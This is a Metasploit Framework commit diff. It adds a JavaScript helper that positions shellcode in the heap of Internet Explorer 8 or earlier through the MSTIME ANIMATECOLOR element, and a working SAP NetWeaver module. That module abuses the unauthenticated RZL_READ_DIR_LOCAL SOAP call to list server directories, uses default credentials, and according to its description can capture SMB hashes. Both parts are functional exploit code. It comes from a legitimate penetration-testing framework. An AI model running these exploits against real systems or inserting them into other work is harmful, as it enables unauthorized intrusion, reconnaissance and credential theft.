bug/bundler_fix
jvazquez-r7 2013-05-02 09:27:51 -05:00
commit 29d4e378aa
2 changed files with 191 additions and 0 deletions

View File

@ -853,6 +853,74 @@ protected
| |
end end
#
# This function takes advantage of MSTIME's CTIMEAnimationBase::put_values function that's
# suitable for a no-spray technique. There should be an allocation that contains an array of
# pointers to strings that we control, and each string should reside in its own buffer.
# Please note newer IEs (such as IE9), no longer support SMIL, therefore this only works on
# Internet Explorer 8 or prior. Note that "mstime_malloc" also requires a rather specific
# writing style, so make sure you have the following before using:
# * You must have the following at the beginning of your HTML file:
# <!doctype html>
# <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
# * You must have the following in <meta>:
# <meta>
# <?IMPORT namespace="t" implementation="#default#time2">
# </meta>
#
# The "mstime_malloc" JavaScript function supports the following arguments:
# shellcode => The shellcode to place.
# offset => Optional. The pointer index that points to the shellcode.
# heapBlockSize => Object size.
# objId => The ID to your ANIMATECOLOR element.
#
# Example of using "js_mstime_malloc":
# <script>
# #{js_mstime_malloc}
#
# shellcode = unescape("%u4141%u4141%u4141%u4141%u4141");
# offset = 3;
# s = 0x58;
# mstime_malloc({shellcode:shellcode,offset:offset,heapBlockSize:s,objId:oId});
# </script>
#
def js_mstime_malloc
%Q|
function mstime_malloc(oArg) {
shellcode = oArg.shellcode;
offset = oArg.offset;
heapBlockSize = oArg.heapBlockSize;
objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
buf = "";
for (i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";##{Rex::Text.rand_text_hex(6)}";
}
}
e = document.getElementById(objId);
if (e == null) {
eleId = "#{Rex::Text.rand_text_alpha(5)}"
acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}
|
end
# #
# This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty) # This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty)
# function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's # function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's

View File

@ -0,0 +1,123 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy.
#
# The following guys from ERP-SCAN deserve credit for their contributions -
# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
# Dmitry Evdokimov.
#
# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
# who have Beta tested the modules and provided excellent feedback. Some people
# just seem to enjoy hacking SAP :)
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing',
'Description' => %q{
This module exploits the SAP NetWeaver RZL_READ_DIR_LOCAL function, on the SAP
SOAP RFC Service, to enumerate directory contents. It returns only the first 32
characters of the filename since they are truncated. The module can also be used to
capture SMB hashes by using a fake SMB share as DIR.
},
'References' => [
[ 'OSVDB', '92732'],
[ 'URL', 'http://erpscan.com/advisories/dsecrg-12-026-sap-netweaver-rzl_read_dir_local-missing-authorization-check-and-smb-relay-vulnerability/' ]
],
'Author' =>
[
'Alexey Tyurin', # Vulnerability discovery
'nmonkee' # Metasploit module
],
'License' => MSF_LICENSE
)
register_options([
OptString.new('CLIENT', [true, 'SAP Client', '001']),
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('PASSWORD', [true, 'Password', '06071992']),
OptString.new('DIR',[true,'Directory path (e.g. /etc)','/etc'])
], self.class)
end
def parse_xml(xml_data)
files = []
xml_doc = Nokogiri::XML(xml_data)
xml_doc.css('item').each {|item|
name = item.css('NAME')
size = item.css('SIZE')
if not name.empty? and not size.empty?
files << { "name" => name.text, "size" => size.text }
end
}
return files
end
def run_host(ip)
data = '<?xml version="1.0" encoding="utf-8" ?>'
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
data << '<SOAP-ENV:Header/>'
data << '<SOAP-ENV:Body>'
data << '<RZL_READ_DIR_LOCAL xmlns="urn:sap-com:document:sap:rfc:functions">'
data << '<FILE_TBL>'
data << '<item>'
data << '<NAME></NAME>'
data << '<SIZE></SIZE>'
data << '</item>'
data << '</FILE_TBL>'
data << '<NAME>' + datastore['DIR'] + '</NAME>'
data << '</RZL_READ_DIR_LOCAL>'
data << '</SOAP-ENV:Body>'
data << '</SOAP-ENV:Envelope>'
begin
vprint_status("#{rhost}:#{rport} - Sending request to enumerate #{datastore['DIR']}")
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc',
'method' => 'POST',
'data' => data,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
},
'vars_get' => {
'sap-client' => datastore['CLIENT'],
'sap-language' => 'EN'
}
})
if res and res.code == 200 and res.body =~ /rfc:RZL_READ_DIR_LOCAL.Response/
files = parse_xml(res.body)
path = store_loot("sap.soap.rfc.dir", "text/xml", rhost, res.body, datastore['DIR'])
print_good("#{rhost}:#{rport} - #{datastore['DIR']} successfully enumerated, results stored on #{path}")
files.each { |f|
vprint_line("Entry: #{f["name"]}, Size: #{f["size"].to_i}")
}
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Unable to connect")
return
end
end
end